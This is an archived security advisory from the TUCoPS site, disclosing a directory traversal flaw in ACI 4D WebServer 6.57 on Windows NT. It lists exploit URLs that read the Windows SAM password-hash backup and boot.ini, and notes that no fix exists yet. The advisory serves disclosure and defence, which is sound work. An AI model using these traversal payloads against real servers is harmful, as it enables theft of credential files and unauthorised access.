Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: Servers :: aci~1.htm

ACI 4D Webserver directory traversal



COMMAND

    ACI 4D WebServer

SYSTEMS AFFECTED

    ACI 4D WebServer 6.57 (at least)

PROBLEM

    'KF' found following.   This directory transversal  hole seems  to
    work on ACI 4d  webserver running on the  NT platform.  One  would
    imagine exploitation  on a  macos box  would be  similar but would
    require the  proper mac  filesystem path  to the  file you wish to
    view.  Exploit:

        http://host + one of the following urls.
        - /4DBin/_/C:/winnt/repair/sam._
        - /4DBin/_/../winnt/repair/sam._
        - /4DBin/_/C:/inetpub/../boot.ini
        - /4DBin/_/../boot.ini
        - /4DBin/_/../inetpub/../boot.ini

SOLUTION

    Nothing yet.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH